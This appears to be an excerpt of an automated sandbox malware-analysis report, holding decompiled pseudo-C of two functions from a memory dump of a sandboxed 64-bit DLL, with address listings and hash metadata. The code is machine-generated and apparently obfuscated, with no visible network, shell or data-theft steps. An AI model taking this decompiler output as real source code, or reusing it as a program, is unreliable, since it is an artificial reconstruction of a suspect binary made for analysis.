                          			E00007FF87FF88C08B370(signed int __rax, void* __rcx, void* __rdx, long long __r8, long long __r9, signed int __r15) {
                          				signed int _t222;
                          				signed short _t225;
                          				intOrPtr _t229;
                          				long long _t234;
                          				signed int _t235;
                          				signed int _t242;
                          				signed int _t250;
                          				signed int _t256;
                          				signed char _t257;
                          				signed int _t262;
                          				signed int _t281;
                          				signed int _t285;
                          				signed long long _t286;
                          				signed int _t288;
                          				signed int _t328;
                          				void* _t330;
                          				signed long long _t346;
                          				intOrPtr _t347;
                          				signed int _t348;
                          				signed long long _t350;
                          				signed long long _t353;
                          				signed long long _t355;
                          				intOrPtr _t356;
                          				intOrPtr _t357;
                          				signed long long _t359;
                          				intOrPtr _t369;
                          				signed long long _t374;
                          				signed long long _t377;
                          				signed long long _t378;
                          				intOrPtr _t379;
                          				intOrPtr _t386;
                          				intOrPtr _t387;
                          				signed long long _t388;
                          				signed long long _t394;
                          				signed int _t399;
                          				signed long long _t403;
                          				signed long long _t404;
                          				signed long long _t405;
                          				signed long long _t407;
                          				signed long long _t410;
                          				intOrPtr _t414;
                          				signed int _t418;
                          				signed long long _t419;
                          				signed long long _t423;
                          				signed int _t429;
                          				signed long long _t431;
                          				signed long long _t433;
                          				signed int _t437;
                          				signed int _t443;
                          				void* _t445;
                          				signed long long _t446;
                          				void* _t448;
                          				signed int* _t449;
                          				long long _t451;
                          				long long _t452;
                          				signed long long _t456;
                          				signed int _t461;
                          				signed long long _t464;
                          				signed long long _t465;
                          				signed int _t466;
                          				signed int* _t468;
                          				signed long long _t469;
                          				signed long long _t470;
                          				signed long long _t472;
                          				signed long long _t476;
                          				signed int _t481;
                          
                          				_t451 = __r8;
                          				 *((long long*)(_t448 + 0x20)) = __r9;
                          				 *((long long*)(_t448 + 0x18)) = __r8;
                          				_push(_t445);
                          				_push(_t476);
                          				_t449 = _t448 - 0x60;
                          				_t469 =  *0x8c0b41a0; // 0x0
                          				_t461 =  *0x8c0b4180; // 0x0
                          				r8d = __rcx + 1;
                          				r14d =  *0x8c0b4158 & 0x000000ff;
                          				r13d = 0x3c2;
                          				_t456 = _t449[0x32];
                          				_t449[0x2a] =  *(__r9 + _t469 * 4) & 0x0000ffff ^ r10d;
                          				_t470 = _t469 - 1;
                          				_t449[8] = __rax;
                          				 *0x8c0b4130 = ( *0x8c0b4130 & 0x0000ffff) + 1;
                          				_t449[0xe] =  *0x8c0b4134;
                          				_t449[4] = _t461;
                          				 *0x8c0b4180 = _t461 - 1;
                          				_t449[0xa] =  *((intOrPtr*)(__r8 +  *0x8c0b4168 * 4));
                          				 *0x8c0b41a0 = _t470;
                          				_t437 = ( *0x8c0b4120 & 0x0000ffff) - r8d;
                          				r8d = r8d - 1;
                          				_t449[0x10] = _t437;
                          				_t328 = ( *0x8c0b4122 & 0x000000ff) +  *((intOrPtr*)(__r8 + (_t470 + _t470 * 2) * 4));
                          				_t346 = r8d;
                          				_t449[2] = _t346;
                          				_t347 =  *0x8c0b4128; // 0x0
                          				_t464 = _t346 | 0x00001de4;
                          				_t449[1] = _t328;
                          				_t449[6] = _t464;
                          				_t449[0x28] =  *(_t347 + _t470 * 8) & 0x000000ff;
                          				_t222 =  *0x8c0b4124; // 0x0
                          				 *((intOrPtr*)(__r8 + (_t222 + _t222) * 4)) =  *((intOrPtr*)(__r8 + (__r8 + 1) * 4));
                          				_t225 = __r8 - 1;
                          				 *_t449 = _t225;
                          				_t348 =  *0x8c0b41a0; // 0x0
                          				 *0x8c0b41a0 = _t348 + 1;
                          				_t399 = __rdx + _t456 * 8;
                          				 *((short*)(0x35d9 + _t456 * 2)) = ((_t225 ^ 0x00000a54) &  *(__rdx + 0x7d8)) -  *((intOrPtr*)(0x35d9 + _t456 * 2));
                          				_t350 =  *0x8c0b4198; // 0x0
                          				_t449[0xc] = _t399;
                          				if ( *_t399 - _t350 <= 0) goto 0x8c08b992;
                          				_t330 =  *0x8c0b414c - r8d; // 0x0
                          				_t449[0x16] = __r15;
                          				_t481 = _t449[0x30];
                          				if (_t330 > 0) goto 0x8c08b5f6;
                          				_t229 =  *0x8c0b4148; // 0x0
                          				if (_t449[4] !=  *((intOrPtr*)(__r8 + (_t229 + _t229) * 4))) goto 0x8c08b5f6;
                          				if (_t449[0xa] - 0x18b2 > 0) goto 0x8c08b5f6;
                          				r8d =  *0x8c0b4124; // 0x0
                          				_t46 = _t451 + 4; // 0x4
                          				if ( *((intOrPtr*)(_t464 + _t46 * 4)) - ( *(__r9 + _t456 * 4 * 2) & 0x0000ffff) <= 0) goto 0x8c08b5f6;
                          				_t465 = _t449[0x2a];
                          				if (_t328 -  *((intOrPtr*)(_t437 + _t465 * 4)) <= 0) goto 0x8c08b67f;
                          				 *0x8c0b4194 =  *0x8c0b4194 - 1;
                          				_t54 = _t445 + 0xd; // 0x3cf
                          				_t403 = _t54;
                          				 *(_t481 + _t403 * 4) =  *_t449;
                          				_t234 =  *0x8c0b4150; // 0x0
                          				 *((intOrPtr*)(__r8 + _t403 * 8)) = _t234;
                          				_t235 =  *0x8c0b4168; // 0x0
                          				asm("cdq");
                          				 *(__r9 + _t465 * 2) = _t235 / ( *(__r9 + _t465 * 2) & 0x0000ffff);
                          				_t285 =  *0x8c0b4168; // 0x0
                          				_t286 = _t285 + 1;
                          				_t353 = _t286;
                          				 *0x8c0b4168 = _t286 + 1;
                          				_t288 =  *0x8c0b4120 & 0x0000ffff;
                          				 *0x8c0b4198 = _t353;
                          				 *0x8c0b4123 =  *0x8c0b4123 | ( *(__r9 + 0x13ec) & 0x000000ff) + _t288;
                          				 *0x8c0b4120 = _t288 + 1;
                          				_t404 =  *0x8c0b4170; // 0x0
                          				_t405 = _t404 - 1;
                          				 *0x8c0b4170 = _t405;
                          				 *(_t449[0xc]) = _t353 | _t456;
                          				goto 0x8c08b98d;
                          				_t355 =  *0x8c0b41a0; // 0x0
                          				_t242 =  *0x8c0b4168; // 0x0
                          				_t407 = _t242 + 4;
                          				_t356 =  *0x8c0b4140; // 0x0
                          				 *((intOrPtr*)(__r9 + _t355 * 2)) =  *((intOrPtr*)(__r9 + _t355 * 2)) + ( *(_t356 + _t407 * 4) & 0x0000ffff);
                          				_t357 =  *0x8c0b41a8; // 0x0
                          				 *(_t357 + 0x3c2) =  *(_t357 + 0x3c2) ^ 0x00000080;
                          				 *0x8c0b41a0 =  *0x8c0b41a0 & _t407;
                          				 *0x8c0b4148 = 0x158d % _t405 + 1;
                          				 *(_t481 + _t456 * 4) =  *(_t481 + _t456 * 4) ^ 0x00001de7;
                          				_t429 = _t456 * 4;
                          				 *(_t429 + _t429 + 0x35d9) =  *(_t429 + _t429 + 0x35d9) ^ ( *(__r8 + _t449[2] * 4) & 0x0000ffff) * 0x00000c36;
                          				r8d =  *0x8c0b4124; // 0x0
                          				goto 0x8c08b689;
                          				_t466 = _t449[6];
                          				_t99 = _t451 + 2; // 0x2
                          				r9d = r9d - 1;
                          				_t359 =  *((intOrPtr*)(_t437 + _t99 * 4));
                          				if ( *((intOrPtr*)(__rdx + _t456 * 8)) - _t359 <= 0) goto 0x8c08b786;
                          				r14b = r14b + (( *0x4135 & 0x000000ff) * ( *0x8c0b4123 & 0x000000ff) & 0x000000ff) * 0x63;
                          				_t410 = _t429 + _t429;
                          				_t250 =  *0x8c0b4134; // 0x0
                          				 *(_t481 + _t410 * 4) =  *(_t481 + _t410 * 4) & _t250;
                          				 *(__rdx + _t410 * 8) =  *(__rdx + _t359 * 8) * 0x674;
                          				_t452 =  *0x8c0b4150; // 0x0
                          				 *0x8c0b4150 = _t452 +  *((intOrPtr*)(_t466 + 0x4b84));
                          				 *0x8c0b4180 =  *(_t466 + 0x585c) & _t449[4];
                          				_t256 =  *(_t481 + _t456 * 4 * 4) & 0x0000ffff ^ r8w;
                          				 *0x8c0b4190 =  *0x8c0b4190 + _t256;
                          				_t257 = _t256 /  *0x8c0b4194;
                          				_t414 =  *0x8c0b41a8; // 0x0
                          				 *0x8c0b4194 = _t257;
                          				 *(_t414 + _t449[0xe] + 4) =  *(_t414 + _t449[0xe] + 4) & _t257;
                          				 *((intOrPtr*)(_t481 + _t449[2] * 4)) =  *(_t481 + _t449[2] * 4) * ( *0x8c0b4123 & 0x000000ff);
                          				goto 0x8c08b78b;
                          				_t446 = _t328;
                          				_t449[0x32] = 0x52;
                          				_t472 =  *((intOrPtr*)(_t481 + (2 + ( *(__rdx +  *0x8c0b4124 * 8) ^ r9d) * 2) * 4));
                          				_t394 = _t472;
                          				if (_t472 - _t446 < 0) goto 0x8c08b899;
                          				r14b = r14b + 0xff;
                          				_t468 = __rdx + r9d * 8 + 8;
                          				_t262 =  *((__rdx + _t449[0x2a] * 8) * 4 + _t449[6]);
                          				asm("cdq");
                          				 *((_t394 << 4) + _t481 + 0x10 - 0x10) =  *((_t394 << 4) + _t481 + 0x10 - 0x10) & _t262 % r11d;
                          				_t369 =  *0x8c0b4128; // 0x0
                          				 *0x8c0b4133 =  *0x8c0b4133 |  *(_t369 + 0x4134) & 0x000000ff;
                          				_t431 = r11d;
                          				r11d = r11d + 1;
                          				 *(_t449[0x10] + 0x5c + _t446 * 8) = _t262 / r11d /  *(_t449[0x10] + 0x5c + _t446 * 8);
                          				_t418 =  *0x8c0b41a0; // 0x0
                          				_t419 = _t418 + _t418;
                          				_t374 = _t431 -  *(__rdx + _t419 * 8);
                          				 *(__rdx + _t419 * 8) = _t374;
                          				 *_t468 =  *_t468 & _t374;
                          				 *0x8c0b4194 =  *0x8c0b4194 + 1;
                          				r13d = 0xfb - r13d;
                          				 *_t468 =  *_t468 * _t431;
                          				if (_t394 + 1 - _t446 >= 0) goto 0x8c08b7e0;
                          				_t443 = _t449[0x2c];
                          				_t377 =  *0x8c0b4178; // 0x0
                          				 *(_t449[8] + _t377 * 4) =  *(_t377 + 0x2f1c) & 0x0000ffff;
                          				_t378 =  *0x8c0b41a0; // 0x0
                          				 *0x8c0b4194 = 0x8b9 %  *0x8c0b4198;
                          				_t379 =  *0x8c0b41a8; // 0x0
                          				 *((intOrPtr*)(_t443 + _t378 * 4 + 0x20)) = ( *(_t379 + 0x9ee) & 0x000000ff) -  *((intOrPtr*)(_t443 + _t378 * 4 + 0x20));
                          				 *((intOrPtr*)(_t443 + (_t449[1] + 1) * 4)) = 0x134 -  *((intOrPtr*)(_t443 + (_t449[1] + 1) * 4));
                          				 *((intOrPtr*)(_t449[0x2e] + _t449[0x2a] * 2)) = r13w;
                          				_t423 = _t476 * 4;
                          				_t433 =  *((intOrPtr*)(_t443 + _t423 * 4));
                          				if (_t433 != _t423) goto 0x8c08b94e;
                          				 *((_t433 << 4) + 0xc + _t443) =  *((_t433 << 4) + 0xc + _t443) & _t449[0x32];
                          				if (_t433 + 1 == _t423) goto 0x8c08b940;
                          				_t386 =  *0x8c0b4188; // 0x0
                          				 *0x8c0b4194 = 0xfffff211;
                          				_t387 =  *0x8c0b4140; // 0x0
                          				 *0x8c0b4123 =  *(_t386 + 0x1cd0) & 0x000000ff;
                          				_t388 =  *0x8c0b4180; // 0x0
                          				 *0x8c0b4180 = _t388 *  *(_t387 +  *_t449 * 4);
                          				_t281 =  *0x8c0b4168; // 0x0
                          				return _t281;
                          			}





































































                          0x7ff88c08b370
                          0x7ff88c08b370
                          0x7ff88c08b375
                          0x7ff88c08b37b
                          0x7ff88c08b380
                          0x7ff88c08b384
                          0x7ff88c08b388
                          0x7ff88c08b392
                          0x7ff88c08b399
                          0x7ff88c08b3a7
                          0x7ff88c08b3b7
                          0x7ff88c08b3bd
                          0x7ff88c08b3c8
                          0x7ff88c08b3cf
                          0x7ff88c08b3d9
                          0x7ff88c08b3e1
                          0x7ff88c08b3ef
                          0x7ff88c08b3fb
                          0x7ff88c08b403
                          0x7ff88c08b40e
                          0x7ff88c08b41d
                          0x7ff88c08b424
                          0x7ff88c08b427
                          0x7ff88c08b42e
                          0x7ff88c08b433
                          0x7ff88c08b436
                          0x7ff88c08b43c
                          0x7ff88c08b441
                          0x7ff88c08b448
                          0x7ff88c08b44f
                          0x7ff88c08b453
                          0x7ff88c08b460
                          0x7ff88c08b46e
                          0x7ff88c08b47c
                          0x7ff88c08b47f
                          0x7ff88c08b483
                          0x7ff88c08b48b
                          0x7ff88c08b495
                          0x7ff88c08b4a8
                          0x7ff88c08b4b5
                          0x7ff88c08b4be
                          0x7ff88c08b4c5
                          0x7ff88c08b4cd
                          0x7ff88c08b4d3
                          0x7ff88c08b4da
                          0x7ff88c08b4df
                          0x7ff88c08b4e7
                          0x7ff88c08b4ed
                          0x7ff88c08b501
                          0x7ff88c08b510
                          0x7ff88c08b516
                          0x7ff88c08b528
                          0x7ff88c08b537
                          0x7ff88c08b53d
                          0x7ff88c08b549
                          0x7ff88c08b54f
                          0x7ff88c08b555
                          0x7ff88c08b55b
                          0x7ff88c08b561
                          0x7ff88c08b564
                          0x7ff88c08b572
                          0x7ff88c08b57a
                          0x7ff88c08b580
                          0x7ff88c08b585
                          0x7ff88c08b58a
                          0x7ff88c08b590
                          0x7ff88c08b592
                          0x7ff88c08b59e
                          0x7ff88c08b5a6
                          0x7ff88c08b5ad
                          0x7ff88c08b5c0
                          0x7ff88c08b5cb
                          0x7ff88c08b5d2
                          0x7ff88c08b5d9
                          0x7ff88c08b5df
                          0x7ff88c08b5ee
                          0x7ff88c08b5f1
                          0x7ff88c08b5f6
                          0x7ff88c08b601
                          0x7ff88c08b60f
                          0x7ff88c08b612
                          0x7ff88c08b61d
                          0x7ff88c08b620
                          0x7ff88c08b627
                          0x7ff88c08b642
                          0x7ff88c08b651
                          0x7ff88c08b657
                          0x7ff88c08b663
                          0x7ff88c08b66e
                          0x7ff88c08b676
                          0x7ff88c08b67d
                          0x7ff88c08b67f
                          0x7ff88c08b689
                          0x7ff88c08b68d
                          0x7ff88c08b693
                          0x7ff88c08b69e
                          0x7ff88c08b6c9
                          0x7ff88c08b6cc
                          0x7ff88c08b6cf
                          0x7ff88c08b6d5
                          0x7ff88c08b6ee
                          0x7ff88c08b6f9
                          0x7ff88c08b703
                          0x7ff88c08b71f
                          0x7ff88c08b736
                          0x7ff88c08b73d
                          0x7ff88c08b759
                          0x7ff88c08b75c
                          0x7ff88c08b768
                          0x7ff88c08b76e
                          0x7ff88c08b780
                          0x7ff88c08b784
                          0x7ff88c08b791
                          0x7ff88c08b794
                          0x7ff88c08b7a5
                          0x7ff88c08b7a9
                          0x7ff88c08b7af
                          0x7ff88c08b7e0
                          0x7ff88c08b7e4
                          0x7ff88c08b7fb
                          0x7ff88c08b7ff
                          0x7ff88c08b803
                          0x7ff88c08b809
                          0x7ff88c08b817
                          0x7ff88c08b831
                          0x7ff88c08b834
                          0x7ff88c08b837
                          0x7ff88c08b83e
                          0x7ff88c08b845
                          0x7ff88c08b848
                          0x7ff88c08b84c
                          0x7ff88c08b863
                          0x7ff88c08b86b
                          0x7ff88c08b874
                          0x7ff88c08b87e
                          0x7ff88c08b884
                          0x7ff88c08b891
                          0x7ff88c08b899
                          0x7ff88c08b8b7
                          0x7ff88c08b8c8
                          0x7ff88c08b8cf
                          0x7ff88c08b8d9
                          0x7ff88c08b8ee
                          0x7ff88c08b8fe
                          0x7ff88c08b911
                          0x7ff88c08b91e
                          0x7ff88c08b921
                          0x7ff88c08b930
                          0x7ff88c08b940
                          0x7ff88c08b94c
                          0x7ff88c08b94e
                          0x7ff88c08b955
                          0x7ff88c08b966
                          0x7ff88c08b96d
                          0x7ff88c08b97b
                          0x7ff88c08b986
                          0x7ff88c08b992
                          0x7ff88c08b9a6

                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9183cfed9594700024813088ad83315804a1e0c59a4b8eba35b8c92b38daba53
                          • Instruction ID: 256fc126cb478215b11cb1c7755719946a2e1bfd83907b83ecd29e12df60cf68
                          • Opcode Fuzzy Hash: 9183cfed9594700024813088ad83315804a1e0c59a4b8eba35b8c92b38daba53
                          • Instruction Fuzzy Hash: 91029272A09B8586EF10CF55E8906797BA4FB5ABC1F024536DA8D87368DF3CE210DB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00007FF87FF88C088D50(signed int __ebx, void* __ecx, signed int __edi, long long __rbx, signed int __rcx, void* __rdx, long long __rbp, void* __r8, void* __r9, signed int _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40) {
                          				signed int _t208;
                          				signed int _t214;
                          				signed int _t219;
                          				signed int _t221;
                          				signed int _t239;
                          				void* _t340;
                          				void* _t341;
                          				void* _t344;
                          				intOrPtr _t352;
                          				intOrPtr _t368;
                          				intOrPtr _t374;
                          				intOrPtr _t378;
                          				signed long long _t380;
                          				intOrPtr _t381;
                          				signed long long _t382;
                          				intOrPtr _t383;
                          				intOrPtr _t386;
                          				signed long long _t388;
                          				intOrPtr _t391;
                          				signed long long _t394;
                          				signed long long _t404;
                          				signed long long _t405;
                          				void* _t406;
                          				signed long long _t407;
                          				void* _t413;
                          				void* _t417;
                          				signed long long _t418;
                          				signed long long _t420;
                          				signed long long _t421;
                          				signed long long _t422;
                          				void* _t429;
                          				signed long long _t430;
                          				void* _t436;
                          				signed long long _t442;
                          				signed long long _t451;
                          				signed long long _t453;
                          				signed long long _t456;
                          				signed long long _t461;
                          				signed long long _t462;
                          				signed long long _t466;
                          				signed long long _t476;
                          				intOrPtr _t479;
                          				signed int* _t480;
                          				intOrPtr _t481;
                          				intOrPtr _t482;
                          				intOrPtr _t483;
                          
                          				_t436 = __r8;
                          				_t413 = __rdx;
                          				_a24 = __rbx;
                          				_a32 = __rbp;
                          				_t3 = _t413 - 1; // 0x38
                          				_t481 = _a40;
                          				_t5 = _t436 + 1; // 0x1
                          				_t429 = _t5;
                          				_t476 =  *0x8c0b41a0; // 0x0
                          				r13d = 0x13f3;
                          				_a8 =  *0x8c0b416c & 0x0000ffff;
                          				r15d = __ebx & 0x0000ffff;
                          				r15w = r15w + r15w;
                          				_a16 = _t476 + __rcx;
                          				r11d =  *(__r9 +  *0x8c0b4148 * 8);
                          				r11d = r11d - __ebx;
                          				if ( *((long long*)(_t481 + ( *_t480 +  *_t480) * 8)) - 0x1786 < 0) goto 0x8c088dd6;
                          				if (0x1d27 -  *0x8c0b4194 - 0x13a3 > 0) goto 0x8c088f05;
                          				_t352 =  *0x8c0b4138; // 0x0
                          				_t430 = _t429 + 1;
                          				if ( *((intOrPtr*)(_t352 + 0x80 + _t430 * 8)) - _t429 > 0) goto 0x8c088f05;
                          				if (_t352 != __rcx) goto 0x8c088f05;
                          				 *0x8c0b4124 =  *0x8c0b4124 + r8d;
                          				 *_t480 =  *_t480 - 1;
                          				_t208 =  *_t480 + 7;
                          				_t461 = _t208 +  *0x8c0b41a8;
                          				 *_t461 = ( *_t461 & 0x000000ff) * ((_t208 % r11d & 0x000000ff) * 0x00000033 & 0x000000ff);
                          				 *0x8c0b41a0 =  *0x8c0b4148;
                          				 *(0x13f3 +  *_t480 * 4) =  *(0x13f3 +  *_t480 * 4) | 0x000005a1;
                          				_t214 =  *0x8c0b4124; // 0x0
                          				_t417 = _t214 + 5;
                          				r9d =  *(_t417 + _t417 + 0x1c6a) & 0x0000ffff;
                          				_t340 = _t461 -  *0x8c0b4180; // 0x0
                          				if (_t340 > 0) goto 0x8c088f05;
                          				asm("o16 nop [eax+eax]");
                          				r8d =  *0x8c0b4133 & 0x000000ff;
                          				 *0x8c0b4133 = 0x1625 % r8d;
                          				_t219 =  *( *0x8c0b414c +  *0x8c0b414c + 0x1c6a) & 0x0000ffff ^ r11d;
                          				asm("cdq");
                          				r9d = r9d + 1;
                          				 *((intOrPtr*)(0x13f3 + _t461 * 8 + 8 - 8)) =  *((intOrPtr*)(0x13f3 + _t461 * 8 + 8 - 8)) + _t219 % r9d;
                          				_t341 = r9d -  *0x8c0b4180; // 0x0
                          				if (_t341 <= 0) goto 0x8c088ec0;
                          				_t462 =  *0x8c0b4170; // 0x0
                          				_t221 = _t219 / r9d /  *(0x13f3 + _t462 * 4);
                          				 *(0x13f3 + _t462 * 4) = _t221;
                          				_t442 = __r9 +  *_t480 * 8;
                          				 *_t442 = _t417;
                          				_t368 =  *0x8c0b4160; // 0x0
                          				r8d =  *(_t368 + 0x1e6a) & 0x000000ff;
                          				_t418 =  *0x8c0b4194;
                          				r8d = r8d -  *0x8c0b4148;
                          				 *0x8c0b4148 = r8d;
                          				 *0x8c0b4133 = ( *0x8c0b4133 & 0x000000ff) * ((_t221 /  *_t442 / _t442 * ( *(_t481 + 0x4968) | _t418) % _t430 ^ 0x0000004d) & 0x000000ff);
                          				 *((long long*)(__r9 +  *_t480 * 8)) = 0x177c;
                          				r10d =  *(0x13f3 +  *_t480 * 4);
                          				_t374 =  *0x8c0b4188; // 0x0
                          				if (r10d -  *((intOrPtr*)(_t374 + 0x35f0)) >= 0) goto 0x8c089075;
                          				r13d =  *0x8c0b4134; // 0x0
                          				r11d =  *0x8c0b4124; // 0x0
                          				_t482 =  *0x8c0b4188; // 0x0
                          				 *0x8c0b414c = __ebx;
                          				asm("o16 nop [eax+eax]");
                          				r11d = r11d | r13d;
                          				 *0x8c0b4124 = r11d;
                          				r15w = r15w + __ecx;
                          				r10d = r10d + 1;
                          				 *0x8c0b41a0 = _t418;
                          				if (r10d -  *((intOrPtr*)(_t482 + 0x35f0)) < 0) goto 0x8c089020;
                          				_t483 = _a40;
                          				r13d = 0x13f3;
                          				_t479 = _a16;
                          				r8d = _a8;
                          				r8d = r8d + 1;
                          				_t420 = _t418 -  *(__r9 + __rcx * 8) + 0x1df2;
                          				 *(__r9 + __rcx * 8) = _t420;
                          				_t404 = __rcx + 1;
                          				_t378 =  *0x8c0b4138; // 0x0
                          				r8d = r15w & 0xffffffff;
                          				asm("cdq");
                          				_t344 =  *0x8c0b4134 -  *0x849b; // 0x0
                          				if (_t344 < 0) goto 0x8c089129;
                          				_t239 =  *0x8c0b4148; // 0x0
                          				_t451 =  *0x8c0b4180; // 0x0
                          				_t380 = _t420;
                          				_t421 =  *0x8c0b4178; // 0x0
                          				 *((short*)(_t421 + (_t3 + 1 - 1 + 1) * 2)) = (_t239 + _t239) / (_t451 - __rcx * (_t3 + 1 - 1)) / _t430;
                          				_t422 = _t421 ^ _t380;
                          				 *(_t479 + _t380 * 8) = _t422;
                          				goto 0x8c08919e;
                          				_t381 =  *0x8c0b4128; // 0x0
                          				if ( *((intOrPtr*)(_t381 + _t404 * 8)) == 0x1853) goto 0x8c0892df;
                          				_t453 =  *_t480;
                          				_t382 =  *0x8c0b414c;
                          				if ( *((intOrPtr*)(__r9 + _t453 * 8)) == _t382) goto 0x8c0892df;
                          				_t146 = _t453 + 1; // 0x1002
                          				 *_t480 = _t146;
                          				 *(_t483 + _t382 * 8) = _t422;
                          				_t383 =  *0x8c0b4138; // 0x0
                          				 *((long long*)(_t383 + ( *_t480 + 0x14) * 8)) = _t383 -  *((intOrPtr*)(_t479 + _t404 * 8)) -  *((intOrPtr*)(_t383 + ( *_t480 + 0x14) * 8));
                          				_t405 = _t404 + 1;
                          				_t386 =  *0x8c0b4178; // 0x0
                          				r10d = ( *(_t378 + 0x7c28) * __ebx | __edi) * r8d % r8d + 0x00000001 & 0x0000ffff;
                          				if (r10d - ( *(_t386 + 0x3088) & 0x0000ffff) <= 0) goto 0x8c08929d;
                          				_t406 = _t405 + 1;
                          				_t466 = r10d;
                          				_t388 = _t406 -  *0x8c0b4180;
                          				 *0x8c0b4180 = _t388;
                          				 *0x8c0b4123 = (r10b & 0xffffffff) - (((0x891ac73b * r10d >> 0x00000020) + r10d >> 0x0000000a) + ((0x891ac73b * r10d >> 0x00000020) + r10d >> 0x0000000a >> 0x0000001f) & 0x000000ff) * 0x00000078 | r10b;
                          				 *(_t479 + _t388 * 8) =  *(__r9 + _t466 * 8) + 0x00000eba ^ _t466;
                          				_t456 =  *_t480;
                          				if ( *((intOrPtr*)(__r9 + _t456 * 8)) - _t388 < 0) goto 0x8c089246;
                          				 *(__r9 + _t466 * 8) = _t466;
                          				 *0x8c0b4123 =  *0x8c0b4123 |  *0x8c0b4130 & 0x000000ff;
                          				goto 0x8c089283;
                          				_t174 = _t456 + 1; // 0x1002
                          				_t407 = _t406 - 1;
                          				 *_t480 = _t174;
                          				 *((_t405 << 5) + _t483 + 0x20) =  *((_t405 << 5) + _t483 + 0x20) &  *(_t483 + _t388 * 8);
                          				 *0x8c0b4148 = _t388 %  *0x8c0b4148;
                          				 *((long long*)(__r9 +  *_t480 * 8)) = _t466 -  *((intOrPtr*)(_t483 + _t407 * 8)) -  *((intOrPtr*)(__r9 +  *_t480 * 8));
                          				_t391 =  *0x8c0b4178; // 0x0
                          				r10d = r10d + 1;
                          				if (r10d - ( *(_t391 + 0x3088) & 0x0000ffff) > 0) goto 0x8c0891c3;
                          				_t394 = ( *0x8c0b4194 | _t430) - 0x176d;
                          				 *(_t483 + 8 + _t407 * 8) =  *(_t483 + 8 + _t407 * 8) ^ _t394;
                          				 *((long long*)(__r9 + _t394 * 8)) = ( *(__r9 +  *0x8c0b414c * 8) ^ _t430) +  *0x8c0b414c -  *((intOrPtr*)(__r9 + _t394 * 8)) + 0xa8b;
                          				return __ebx;
                          			}

















































                          0x7ff88c088d50
                          0x7ff88c088d50
                          0x7ff88c088d50
                          0x7ff88c088d55
                          0x7ff88c088d6b
                          0x7ff88c088d6f
                          0x7ff88c088d74
                          0x7ff88c088d74
                          0x7ff88c088d78
                          0x7ff88c088d7f
                          0x7ff88c088d85
                          0x7ff88c088d93
                          0x7ff88c088d97
                          0x7ff88c088d9b
                          0x7ff88c088da3
                          0x7ff88c088dae
                          0x7ff88c088dbe
                          0x7ff88c088dd0
                          0x7ff88c088dd6
                          0x7ff88c088ddd
                          0x7ff88c088de8
                          0x7ff88c088df8
                          0x7ff88c088e20
                          0x7ff88c088e27
                          0x7ff88c088e36
                          0x7ff88c088e43
                          0x7ff88c088e72
                          0x7ff88c088e7e
                          0x7ff88c088e89
                          0x7ff88c088e94
                          0x7ff88c088e9d
                          0x7ff88c088ea0
                          0x7ff88c088ea9
                          0x7ff88c088eb0
                          0x7ff88c088eba
                          0x7ff88c088ec0
                          0x7ff88c088edd
                          0x7ff88c088eeb
                          0x7ff88c088eee
                          0x7ff88c088ef2
                          0x7ff88c088ef5
                          0x7ff88c088efc
                          0x7ff88c088f03
                          0x7ff88c088f05
                          0x7ff88c088f26
                          0x7ff88c088f2b
                          0x7ff88c088f37
                          0x7ff88c088f4c
                          0x7ff88c088f51
                          0x7ff88c088f58
                          0x7ff88c088f6a
                          0x7ff88c088f99
                          0x7ff88c088fa3
                          0x7ff88c088fb7
                          0x7ff88c088fc1
                          0x7ff88c088fcd
                          0x7ff88c088fd5
                          0x7ff88c088fe3
                          0x7ff88c088ff0
                          0x7ff88c088ffe
                          0x7ff88c089005
                          0x7ff88c089010
                          0x7ff88c089016
                          0x7ff88c089029
                          0x7ff88c08902f
                          0x7ff88c089039
                          0x7ff88c08903d
                          0x7ff88c089052
                          0x7ff88c089063
                          0x7ff88c089065
                          0x7ff88c08906a
                          0x7ff88c089070
                          0x7ff88c089075
                          0x7ff88c089086
                          0x7ff88c089093
                          0x7ff88c08909a
                          0x7ff88c08909e
                          0x7ff88c0890a1
                          0x7ff88c0890b7
                          0x7ff88c0890bb
                          0x7ff88c0890c6
                          0x7ff88c0890ce
                          0x7ff88c0890d0
                          0x7ff88c0890e8
                          0x7ff88c0890f5
                          0x7ff88c0890fd
                          0x7ff88c089104
                          0x7ff88c089115
                          0x7ff88c089123
                          0x7ff88c089127
                          0x7ff88c089129
                          0x7ff88c089137
                          0x7ff88c08913d
                          0x7ff88c089141
                          0x7ff88c08914c
                          0x7ff88c089154
                          0x7ff88c089158
                          0x7ff88c08916f
                          0x7ff88c08917c
                          0x7ff88c089198
                          0x7ff88c08919b
                          0x7ff88c08919e
                          0x7ff88c0891a5
                          0x7ff88c0891b3
                          0x7ff88c0891c3
                          0x7ff88c0891c6
                          0x7ff88c0891d0
                          0x7ff88c0891d7
                          0x7ff88c089202
                          0x7ff88c08921e
                          0x7ff88c089222
                          0x7ff88c089231
                          0x7ff88c089233
                          0x7ff88c08923e
                          0x7ff88c089244
                          0x7ff88c089246
                          0x7ff88c08924a
                          0x7ff88c08924d
                          0x7ff88c08925a
                          0x7ff88c08926d
                          0x7ff88c08927f
                          0x7ff88c089283
                          0x7ff88c08928a
                          0x7ff88c089297
                          0x7ff88c0892a7
                          0x7ff88c0892ad
                          0x7ff88c0892dc
                          0x7ff88c0892f5

                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
